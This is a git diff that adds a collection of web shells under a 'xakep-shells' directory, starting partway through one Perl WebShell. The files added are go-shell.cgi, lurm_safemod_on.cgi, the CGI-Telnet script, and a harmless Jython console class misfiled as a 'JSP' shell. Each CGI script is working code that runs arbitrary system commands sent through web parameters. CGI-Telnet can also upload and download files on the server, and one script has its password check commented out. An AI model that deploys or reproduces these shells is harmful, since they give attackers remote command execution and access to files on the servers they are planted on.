+        $login = crypt($WebShell::Configuration::password, $salt);
+    }
+    my $login_cookie = $self->{cgi}->cookie(
+        -name => 'WebShell-login',
+        -value => $login,
+        -domain => $domain,
+        -path => $path,
+    );
+    print $self->{cgi}->header(-cookie => [$cwd_cookie, $login_cookie]);
+    print $text;
+}
+
+###############################################################################
+
+package WebShell;
+
+my $script = new WebShell::Script;
+$script->run;
+
+###############################################################################
+###############################################################################
diff --git a/xakep-shells/CGI/go-shell.cgi.txt b/xakep-shells/CGI/go-shell.cgi.txt
new file mode 100644
index 0000000..e7510b2
--- /dev/null
+++ b/xakep-shells/CGI/go-shell.cgi.txt
@@ -0,0 +1,87 @@
+#!/usr/bin/perl
+
+#change this password; for power security - delete this file =)
+$pwd='adm';
+
+print "Content-type: text/html\n\n";
+&read_param();
+if (!defined$param{dir}){$param{dir}="/"};
+if (!defined$param{cmd}){$param{cmd}="ls -la"};
+if (!defined$param{pwd}){$param{pwd}='ter'};
+
+print << "[kalabanga]";
+<head>
+<title>GO.cgi</title>
+<style>
+BODY, TD { font-family: Tahoma; font-size: 12px; }
+INPUT.TEXT  {
+font-family : Arial;
+font-size : 8pt;
+color : Black;
+width : 100%;
+background-color : #F1F1F1;
+border-style : solid;
+border-width : 0px;
+border-color : Silver;
+}
+INPUT.BUTTON  {
+font-family : Arial;
+font-size : 8pt;
+width : 100px;
+border-width : 1px;
+color : Black;
+background-color : D1D1D1;
+border-color : silver;
+border-style : solid;
+}
+</style>
+</head>
+<body bgcolor=#B9B9B9>
+Current request is:
+<table width=100% bgcolor=D9D9D9><tr><td>
+[kalabanga]
+
+print "cd $param{dir}&&$param{cmd}";
+
+print << "[kalabanga]";
+</td></tr></table>
+Answer for current request is:
+<table width=100% bgcolor=D9D9D9><tr><td><pre>
+[kalabanga]
+
+if ($param{pwd} ne $pwd){print "user invalid, please replace user";}
+else {
+open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
+while ($line=<FILEHANDLE>){print "$line";};
+close (FILEHANDLE);
+};
+
+print << "[kalabanga]";
+</pre></td></tr></table>
+<form action=go.cgi>
+Password:
+<input type=text class="TEXT" name=pwd value=$param{pwd}>
+Dir for next request:
+<input type=text class="TEXT" name=dir value=$param{dir}>
+next request:
+<input type=text class="TEXT" name=cmd value=$param{cmd}>
+<input type=submit class="button" value="Submit">
+<input type=reset class="button" value="Reset">
+</form>
+</body>
+</html>
+[kalabanga]
+
+sub read_param {
+$buffer = "$ENV{'QUERY_STRING'}";
+@pairs = split(/&/, $buffer);
+foreach $pair (@pairs)
+        {
+        ($name, $value) = split(/=/, $pair);
+        $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $value =~ s/\+/ /g;
+        $value =~ s/%20/ /g;
+        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $param{$name} = $value;
+        }
+}
\ No newline at end of file
diff --git a/xakep-shells/CGI/lurm_safemod_on.cgi.txt b/xakep-shells/CGI/lurm_safemod_on.cgi.txt
new file mode 100644
index 0000000..a072668
--- /dev/null
+++ b/xakep-shells/CGI/lurm_safemod_on.cgi.txt
@@ -0,0 +1,94 @@
+#!/usr/bin/perl
+############################################################
+## Network security team                                  ##
+############################################################
+##Coder: Ins                                              ##
+############################################################
+##Ob dannom scripte: Eto prostoj shell napisannyj na perle##
+############################################################
+
+#V celjah nesankcionirovannogo dostupa smeni etot parol`"
+#$pwd='';
+
+print "Content-type: text/html\n\n";
+&read_param();
+if (!defined$param{dir}){$param{dir}="/"};
+if (!defined$param{cmd}){$param{cmd}="ls -la"};
+##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
+
+print << "[ins1]";
+<head>
+<title>::Network Security Team::</title>
+<font size=3 face=verdana><b>Network security team :: CGI Shell</b>
+<font size=-2 face=verdana><br><br>
+<style>
+BODY, TD { font-family: Tahoma; font-size: 12px; }
+INPUT.TEXT  {
+font-family : Arial;
+font-size : 8pt;
+color : Black;
+width : 100%;
+background-color : #F1F1F1;
+border-style : solid;
+border-width : 0px;
+border-color : Silver;
+}
+INPUT.BUTTON  {
+font-family : Arial;
+font-size : 8pt;
+width : 100px;
+border-width : 1px;
+color : Black;
+background-color : D1D1D1;
+border-color : silver;
+border-style : solid;
+}
+</style>
+</head>
+<body bgcolor=#B9B9B9>
+Vvedite zapros:
+<table width=500 bgcolor=D9D9D9><tr><td>
+[ins1]
+
+print "cd $param{dir}&&$param{cmd}";
+
+print << "[ins2]";
+</td></tr></table>
+Otvet na zapros:
+<table width=500 bgcolor=D9D9D9><tr><td><pre>
+[ins2]
+
+#if ($param{pwd} ne $pwd){print "Nepravelnij user";}
+open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
+while ($line=<FILEHANDLE>){print "$line";};
+close (FILEHANDLE);
+
+print << "[ins3]";
+</pre></td></tr></table>
+<form action=pshell.cgi>
+DIR dlja sledujushego zaprosa:
+<input type=text class="TEXT" name=dir value=$param{dir}>
+Sledujushij zapros:
+<input type=text class="TEXT" name=cmd value=$param{cmd}>
+<input type=submit class="button" value="Submit">
+<input type=reset class="button" value="Reset">
+</form>
+</body>
+</html>
+[ins3]
+
+sub read_param {
+$buffer = "$ENV{'QUERY_STRING'}";
+@pairs = split(/&/, $buffer);
+foreach $pair (@pairs)
+        {
+        ($name, $value) = split(/=/, $pair);
+        $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $value =~ s/\+/ /g;
+        $value =~ s/%20/ /g;
+        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $param{$name} = $value;
+        }
+}
+
+#########################<<KONEC>>#####################################
\ No newline at end of file
diff --git a/xakep-shells/CGI/telnet.cgi.txt b/xakep-shells/CGI/telnet.cgi.txt
new file mode 100644
index 0000000..15e062c
--- /dev/null
+++ b/xakep-shells/CGI/telnet.cgi.txt
@@ -0,0 +1,697 @@
+#!/usr/bin/perl
+#------------------------------------------------------------------------------
+# Copyright and Licence
+#------------------------------------------------------------------------------
+# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
+#
+# Copyright (C) 2001 Rohitab Batra
+# Permission is granted to use, distribute and modify this script so long
+# as this copyright notice is left intact. If you make changes to the script
+# please document them and inform me. If you would like any changes to be made
+# in this script, you can e-mail me.
+#
+# Author: Rohitab Batra
+# Author e-mail: rohitab@rohitab.com
+# Author Homepage: http://www.rohitab.com/
+# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
+# Product Support: http://www.rohitab.com/support/
+# Discussion Forum: http://www.rohitab.com/discuss/
+# Mailing List: http://www.rohitab.com/mlist/
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Installation
+#------------------------------------------------------------------------------
+# To install this script
+#
+# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
+#    your server. For most servers, you may not need to modify this.
+# 2. Change the password in the Configuration section below.
+# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
+#    Configuration Section below.
+# 4. Upload the script to a directory on your server which has permissions to
+#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
+#    the script in ASCII mode.
+# 5. Change the permission (CHMOD) of the script to 755.
+# 6. Open the script in your web browser. If you uploaded the script in
+#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
+# 7. Login using the password that you specified in Step 2.
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Configuration: You need to change only $Password and $WinNT. The other
+# values should work fine for most systems.
+#------------------------------------------------------------------------------
+$Password = "";         # Change this. You will need to enter this
+                                # to login.
+
+$WinNT = 0;                     # You need to change the value of this to 1 if
+                                # you're running this script on a Windows NT
+                                # machine. If you're running it on Unix, you
+                                # can leave the value as it is.
+
+$NTCmdSep = "&";                # This character is used to seperate 2 commands
+                                # in a command line on Windows NT.
+
+$UnixCmdSep = ";";              # This character is used to seperate 2 commands
+                                # in a command line on Unix.
+
+$CommandTimeoutDuration = 100000;   # Time in seconds after commands will be killed
+                                # Don't set this to a very large value. This is
+                                # useful for commands that may hang or that
+                                # take very long to execute, like "find /".
+                                # This is valid only on Unix servers. It is
+                                # ignored on NT Servers.
+
+$ShowDynamicOutput = 1;         # If this is 1, then data is sent to the
+                                # browser as soon as it is output, otherwise
+                                # it is buffered and send when the command
+                                # completes. This is useful for commands like
+                                # ping, so that you can see the output as it
+                                # is being generated.
+
+# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
+
+$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
+$CmdPwd = ($WinNT ? "cd" : "pwd");
+$PathSep = ($WinNT ? "\\" : "/");
+$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
+
+#------------------------------------------------------------------------------
+# Reads the input sent by the browser and parses the input variables. It
+# parses GET, POST and multipart/form-data that is used for uploading files.
+# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
+# Other variables can be accessed using $in{'var'}, where var is the name of
+# the variable. Note: Most of the code in this function is taken from other CGI
+# scripts.
+#------------------------------------------------------------------------------
+sub ReadParse
+{
+        local (*in) = @_ if @_;
+        local ($i, $loc, $key, $val);
+
+        $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
+
+        if($ENV{'REQUEST_METHOD'} eq "GET")
+        {
+                $in = $ENV{'QUERY_STRING'};
+        }
+        elsif($ENV{'REQUEST_METHOD'} eq "POST")
+        {
+                binmode(STDIN) if $MultipartFormData & $WinNT;
+                read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
+        }
+
+        # handle file upload data
+        if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
+        {
+                $Boundary = '--'.$1; # please refer to RFC1867
+                @list = split(/$Boundary/, $in);
+                $HeaderBody = $list[1];
+                $HeaderBody =~ /\r\n\r\n|\n\n/;
+                $Header = $`;
+                $Body = $';
+                $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
+                $in{'filedata'} = $Body;
+                $Header =~ /filename=\"(.+)\"/;
+                $in{'f'} = $1;
+                $in{'f'} =~ s/\"//g;
+                $in{'f'} =~ s/\s//g;
+
+                # parse trailer
+                for($i=2; $list[$i]; $i++)
+                {
+                        $list[$i] =~ s/^.+name=$//;
+                        $list[$i] =~ /\"(\w+)\"/;
+                        $key = $1;
+                        $val = $';
+                        $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
+                        $val =~ s/%(..)/pack("c", hex($1))/ge;
+                        $in{$key} = $val;
+                }
+        }
+        else # standard post data (url encoded, not multipart)
+        {
+                @in = split(/&/, $in);
+                foreach $i (0 .. $#in)
+                {
+                        $in[$i] =~ s/\+/ /g;
+                        ($key, $val) = split(/=/, $in[$i], 2);
+                        $key =~ s/%(..)/pack("c", hex($1))/ge;
+                        $val =~ s/%(..)/pack("c", hex($1))/ge;
+                        $in{$key} .= "\0" if (defined($in{$key}));
+                        $in{$key} .= $val;
+                }
+        }
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML Page Header
+# Argument 1: Form item name to which focus should be set
+#------------------------------------------------------------------------------
+sub PrintPageHeader
+{
+        $EncodedCurrentDir = $CurrentDir;
+        $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+        print "Content-type: text/html\n\n";
+        print <<END;
+<html>
+<head>
+<title>CGI-Telnet Version 1.0</title>
+$HtmlMetaHeader
+</head>
+<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
+<table border="1" width="100%" cellspacing="0" cellpadding="2">
+<tr>
+<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
+<b><font color="#000080" size="2">#</font></b></td>
+<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to
+$ServerName</b></font></td>
+</tr>
+<tr>
+<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
+<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
+<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
+<a href="$ScriptLocation?a=logout">Disconnect</a> |
+<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
+</font></td>
+</tr>
+</table>
+<font color="#C0C0C0" size="3">
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the Login Screen
+#------------------------------------------------------------------------------
+sub PrintLoginScreen
+{
+        $Message = q$<pre><font color="#669999"> _____  _____  _____          _____        _               _
+/  __ \|  __ \|_   _|        |_   _|      | |             | |
+| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
+| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
+| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
+ \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
+
+</font><font color="#FF0000">                      ______             </font><font color="#AE8300">� 2001, Rohitab
+Batra</font><font color="#FF0000">
+                   .-&quot;      &quot;-.
+                  /            \
+                 |              |
+                 |,  .-.  .-.  ,|
+                 | )(_o/  \o_)( |
+                 |/     /\     \|
+       (@_       (_     ^^     _)
+  _     ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font
+color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font
+color="#FF0000">/</font><font color="#808080">_______________________
+</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font
+color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font
+color="#808080">________________________&gt;</font><font color="#FF0000">
+        )_/        \          /
+       (@           `--------`
+             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
+$;
+#'
+        print <<END;
+<code>
+Trying $ServerName...<br>
+Connected to $ServerName<br>
+Escape character is ^]
+<code>$Message
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the message that informs the user of a failed login
+#------------------------------------------------------------------------------
+sub PrintLoginFailedMessage
+{
+        print <<END;
+<code>
+<br>login: admin<br>
+password:<br>
+Login incorrect<br><br>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form for logging in
+#------------------------------------------------------------------------------
+sub PrintLoginForm
+{
+        print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="login">
+login: admin<br>
+password:<input type="password" name="p">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the footer for the HTML Page
+#------------------------------------------------------------------------------
+sub PrintPageFooter
+{
+        print "</font></body></html>";
+}
+
+#------------------------------------------------------------------------------
+# Retreives the values of all cookies. The cookies can be accesses using the
+# variable $Cookies{''}
+#------------------------------------------------------------------------------
+sub GetCookies
+{
+        @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
+        foreach $cookie(@httpcookies)
+        {
+                ($id, $val) = split(/=/, $cookie);
+                $Cookies{$id} = $val;
+        }
+}
+
+#------------------------------------------------------------------------------
+# Prints the screen when the user logs out
+#------------------------------------------------------------------------------
+sub PrintLogoutScreen
+{
+        print "<code>Connection closed by foreign host.<br><br></code>";
+}
+
+#------------------------------------------------------------------------------
+# Logs out the user and allows the user to login again
+#------------------------------------------------------------------------------
+sub PerformLogout
+{
+        print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
+        &PrintPageHeader("p");
+        &PrintLogoutScreen;
+        &PrintLoginScreen;
+        &PrintLoginForm;
+        &PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called to login the user. If the password matches, it
+# displays a page that allows the user to run commands. If the password doens't
+# match or if no password is entered, it displays a form that allows the user
+# to login
+#------------------------------------------------------------------------------
+sub PerformLogin
+{
+        if($LoginPassword eq $Password) # password matched
+        {
+                print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
+                &PrintPageHeader("c");
+                &PrintCommandLineInputForm;
+                &PrintPageFooter;
+        }
+        else # password didn't match
+        {
+                &PrintPageHeader("p");
+                &PrintLoginScreen;
+                if($LoginPassword ne "") # some password was entered
+                {
+                        &PrintLoginFailedMessage;
+                }
+                &PrintLoginForm;
+                &PrintPageFooter;
+        }
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to enter commands
+#------------------------------------------------------------------------------
+sub PrintCommandLineInputForm
+{
+        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+        print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="command">
+<input type="hidden" name="d" value="$CurrentDir">
+$Prompt
+<input type="text" name="c">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to download files
+#------------------------------------------------------------------------------
+sub PrintFileDownloadForm
+{
+        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+        print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="download">
+$Prompt download<br><br>
+Filename: <input type="text" name="f" size="35"><br><br>
+Download: <input type="submit" value="Begin">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to upload files
+#------------------------------------------------------------------------------
+sub PrintFileUploadForm
+{
+        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+        print <<END;
+<code>
+<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
+$Prompt upload<br><br>
+Filename: <input type="file" name="f" size="35"><br><br>
+Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
+Overwrite if it Exists<br><br>
+Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="upload">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the timeout for a command expires. We need to
+# terminate the script immediately. This function is valid only on Unix. It is
+# never called when the script is running on NT.
+#------------------------------------------------------------------------------
+sub CommandTimeout
+{
+        if(!$WinNT)
+        {
+                alarm(0);
+                print <<END;
+</xmp>
+<code>
+Command exceeded maximum time of $CommandTimeoutDuration second(s).
+<br>Killed it!
+<code>
+END
+                &PrintCommandLineInputForm;
+                &PrintPageFooter;
+                exit;
+        }
+}
+
+#------------------------------------------------------------------------------
+# This function is called to execute commands. It displays the output of the
+# command and allows the user to enter another command. The change directory
+# command is handled differently. In this case, the new directory is stored in
+# an internal variable and is used each time a command has to be executed. The
+# output of the change directory command is not displayed to the users
+# therefore error messages cannot be displayed.
+#------------------------------------------------------------------------------
+sub ExecuteCommand
+{
+        if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
+        {
+                # we change the directory internally. The output of the
+                # command is not displayed.
+
+                $OldDir = $CurrentDir;
+                $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
+                chop($CurrentDir = `$Command`);
+                &PrintPageHeader("c");
+                $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
+                print "<code>$Prompt $RunCommand</code>";
+        }
+        else # some other command, display the output
+        {
+                &PrintPageHeader("c");
+                $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+                print "<code>$Prompt $RunCommand</code><xmp>";
+                $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
+                if(!$WinNT)
+                {
+                        $SIG{'ALRM'} = \&CommandTimeout;
+                        alarm($CommandTimeoutDuration);
+                }
+                if($ShowDynamicOutput) # show output as it is generated
+                {
+                        $|=1;
+                        $Command .= " |";
+                        open(CommandOutput, $Command);
+                        while(<CommandOutput>)
+                        {
+                                $_ =~ s/(\n|\r\n)$//;
+                                print "$_\n";
+                        }
+                        $|=0;
+                }
+                else # show output after command completes
+                {
+                        print `$Command`;
+                }
+                if(!$WinNT)
+                {
+                        alarm(0);
+                }
+                print "</xmp>";
+        }
+        &PrintCommandLineInputForm;
+        &PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function displays the page that contains a link which allows the user
+# to download the specified file. The page also contains a auto-refresh
+# feature that starts the download automatically.
+# Argument 1: Fully qualified filename of the file to be downloaded
+#------------------------------------------------------------------------------
+sub PrintDownloadLinkPage
+{
+        local($FileUrl) = @_;
+        if(-e $FileUrl) # if the file exists
+        {
+                # encode the file link so we can send it to the browser
+                $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+                $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
+                $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
+                &PrintPageHeader("c");
+                print <<END;
+<code>
+Sending File $TransferFile...<br>
+If the download does not start automatically,
+<a href="$DownloadLink">Click Here</a>.
+</code>
+END
+                &PrintCommandLineInputForm;
+                &PrintPageFooter;
+        }
+        else # file doesn't exist
+        {
+                &PrintPageHeader("f");
+                print "<code>Failed to download $FileUrl: $!</code>";
+                &PrintFileDownloadForm;
+                &PrintPageFooter;
+        }
+}
+
+#------------------------------------------------------------------------------
+# This function reads the specified file from the disk and sends it to the
+# browser, so that it can be downloaded by the user.
+# Argument 1: Fully qualified pathname of the file to be sent.
+#------------------------------------------------------------------------------
+sub SendFileToBrowser
+{
+        local($SendFile) = @_;
+        if(open(SENDFILE, $SendFile)) # file opened for reading
+        {
+                if($WinNT)
+                {
+                        binmode(SENDFILE);
+                        binmode(STDOUT);
+                }
+                $FileSize = (stat($SendFile))[7];
+                ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
+                print "Content-Type: application/x-unknown\n";
+                print "Content-Length: $FileSize\n";
+                print "Content-Disposition: attachment; filename=$1\n\n";
+                print while(<SENDFILE>);
+                close(SENDFILE);
+        }
+        else # failed to open file
+        {
+                &PrintPageHeader("f");
+                print "<code>Failed to download $SendFile: $!</code>";
+                &PrintFileDownloadForm;
+                &PrintPageFooter;
+        }
+}
+
+
+#------------------------------------------------------------------------------
+# This function is called when the user downloads a file. It displays a message
+# to the user and provides a link through which the file can be downloaded.
+# This function is also called when the user clicks on that link. In this case,
+# the file is read and sent to the browser.
+#------------------------------------------------------------------------------
+sub BeginDownload
+{
+        # get fully qualified path of the file to be downloaded
+        if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+                (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+        {
+                $TargetFile = $TransferFile;
+        }
+        else # path is relative
+        {
+                chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+                $TargetFile .= $PathSep.$TransferFile;
+        }
+
+        if($Options eq "go") # we have to send the file
+        {
+                &SendFileToBrowser($TargetFile);
+        }
+        else # we have to send only the link page
+        {
+                &PrintDownloadLinkPage($TargetFile);
+        }
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to upload a file. If the
+# file is not specified, it displays a form allowing the user to specify a
+# file, otherwise it starts the upload process.
+#------------------------------------------------------------------------------
+sub UploadFile
+{
+        # if no file is specified, print the upload form again
+        if($TransferFile eq "")
+        {
+                &PrintPageHeader("f");
+                &PrintFileUploadForm;
+                &PrintPageFooter;
+                return;
+        }
+        &PrintPageHeader("c");
+
+        # start the uploading process
+        print "<code>Uploading $TransferFile to $CurrentDir...<br>";
+
+        # get the fullly qualified pathname of the file to be created
+        chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
+        $TransferFile =~ m!([^/^\\]*)$!;
+        $TargetName .= $PathSep.$1;
+
+        $TargetFileSize = length($in{'filedata'});
+        # if the file exists and we are not supposed to overwrite it
+        if(-e $TargetName && $Options ne "overwrite")
+        {
+                print "Failed: Destination file already exists.<br>";
+        }
+        else # file is not present
+        {
+                if(open(UPLOADFILE, ">$TargetName"))
+                {
+                        binmode(UPLOADFILE) if $WinNT;
+                        print UPLOADFILE $in{'filedata'};
+                        close(UPLOADFILE);
+                        print "Transfered $TargetFileSize Bytes.<br>";
+                        print "File Path: $TargetName<br>";
+                }
+                else
+                {
+                        print "Failed: $!<br>";
+                }
+        }
+        print "</code>";
+        &PrintCommandLineInputForm;
+        &PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to download a file. If the
+# filename is not specified, it displays a form allowing the user to specify a
+# file, otherwise it displays a message to the user and provides a link
+# through  which the file can be downloaded.
+#------------------------------------------------------------------------------
+sub DownloadFile
+{
+        # if no file is specified, print the download form again
+        if($TransferFile eq "")
+        {
+                &PrintPageHeader("f");
+                &PrintFileDownloadForm;
+                &PrintPageFooter;
+                return;
+        }
+
+        # get fully qualified path of the file to be downloaded
+        if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+                (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+        {
+                $TargetFile = $TransferFile;
+        }
+        else # path is relative
+        {
+                chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+                $TargetFile .= $PathSep.$TransferFile;
+        }
+
+        if($Options eq "go") # we have to send the file
+        {
+                &SendFileToBrowser($TargetFile);
+        }
+        else # we have to send only the link page
+        {
+                &PrintDownloadLinkPage($TargetFile);
+        }
+}
+
+#------------------------------------------------------------------------------
+# Main Program - Execution Starts Here
+#------------------------------------------------------------------------------
+&ReadParse;
+&GetCookies;
+
+$ScriptLocation = $ENV{'SCRIPT_NAME'};
+$ServerName = $ENV{'SERVER_NAME'};
+$LoginPassword = $in{'p'};
+$RunCommand = $in{'c'};
+$TransferFile = $in{'f'};
+$Options = $in{'o'};
+
+$Action = $in{'a'};
+$Action = "login" if($Action eq ""); # no action specified, use default
+
+# get the directory in which the commands will be executed
+$CurrentDir = $in{'d'};
+chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
+
+$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
+
+if($Action eq "login" || !$LoggedIn) # user needs/has to login
+{
+        &PerformLogin;
+}
+elsif($Action eq "command") # user wants to run a command
+{
+        &ExecuteCommand;
+}
+elsif($Action eq "upload") # user wants to upload a file
+{
+        &UploadFile;
+}
+elsif($Action eq "download") # user wants to download a file
+{
+        &DownloadFile;
+}
+elsif($Action eq "logout") # user wants to logout
+{
+        &PerformLogout;
+}
diff --git a/xakep-shells/JSP/Java Shell.js.txt b/xakep-shells/JSP/Java Shell.js.txt
new file mode 100644
index 0000000..f15e864
--- /dev/null
+++ b/xakep-shells/JSP/Java Shell.js.txt	
@@ -0,0 +1,125 @@
+package enigma.shells.jython;
+
+import java.io.*;
+import java.awt.*;
+import javax.swing.*;
+
+import enigma.console.*;
+import enigma.console.java2d.*;
+
+import org.python.core.*;
+import org.python.util.*;
+
+public class JythonShell extends JPanel implements Runnable {
+	public static int DEFAULT_ROWS = 20;
+	public static int DEFAULT_COLUMNS = 80;
+	public static int DEFAULT_SCROLLBACK = 100;
+	
+	public PrintStream out;
+	
+	public Console console;
+	public Java2DTextWindow text;
+	public JScrollPane scrollPane;
+	public PythonInterpreter interp;
+	
+	private Color colorBackground = new Color(0, 0, 0);
+	private Color colorForeground = new Color(187, 187, 187);
+	private Color colorError = new Color(187, 0, 0);
+	private Color colorCursor = new Color(187, 187, 0);
+	
+	public JythonShell() {
+		this(null, Py.getSystemState());
+	}
+	
+	public JythonShell(PyObject dict) {
+		this(dict, Py.getSystemState());
+	}
+	
+	public JythonShell(int columns, int rows, int scrollback) {
+		this(null, Py.getSystemState(), columns, rows, scrollback);
+	}
+	
+	public JythonShell(PyObject dict, PySystemState systemState) {
+		this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK);
+	}
+	
+	public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) {
+		super(new BorderLayout());
+		
+		text = new Java2DTextWindow(columns, rows, scrollback);
+		text.setBackground(colorBackground);
+		
+		scrollPane = new JScrollPane();
+		scrollPane.setViewportView(text);
+		
+		add(scrollPane, BorderLayout.CENTER);
+		
+		console = new DefaultConsoleImpl(text);
+		out = console.getOutputStream();
+		
+		interp = new PythonInterpreter(dict, systemState);
+		interp.setOut(out);
+		interp.setErr(out);
+	}
+	
+	public void run() {
+		int pos = 0;
+		int tbs = 4;
+		
+		String line = "";
+		String command = "";
+		
+		for (;;) {
+			String space = "";
+			for (int i = 0; i < pos * tbs; i++) {
+				space += " ";
+			}
+			
+			try {
+				console.setTextAttributes(new TextAttributes(colorCursor));
+				
+				if (pos > 0) {
+					out.print(space + "... ");
+				} else {
+					out.print(">> ");
+				}
+				
+				console.setTextAttributes(new TextAttributes(colorForeground));
+				
+				line = console.readLine().trim();
+				if (line.length() == 0 && pos > 0) {
+					pos--;
+				} else if (line.endsWith(":")) {
+					command += space + line + "\n";
+					pos++;
+				} else {
+					command += space + line + "\n";
+				}
+				
+				if (pos == 0) {
+					interp.exec(command);
+					command = "";
+				}
+			} catch (Exception e) {
+				console.setTextAttributes(new TextAttributes(colorError));
+				
+				e.printStackTrace();
+				command = "";
+			}
+		}
+	}
+	
+	public static void main(String[] argv) {
+		PySystemState.initialize(System.getProperties(), null, argv);
+		
+		JFrame frame = new JFrame("Jython Console");
+		JythonShell console = new JythonShell();
+		
+		frame.add(console, BorderLayout.CENTER);
+		frame.pack();
+		frame.setVisible(true);
+		frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
+		
+		console.run();
+	}
+}
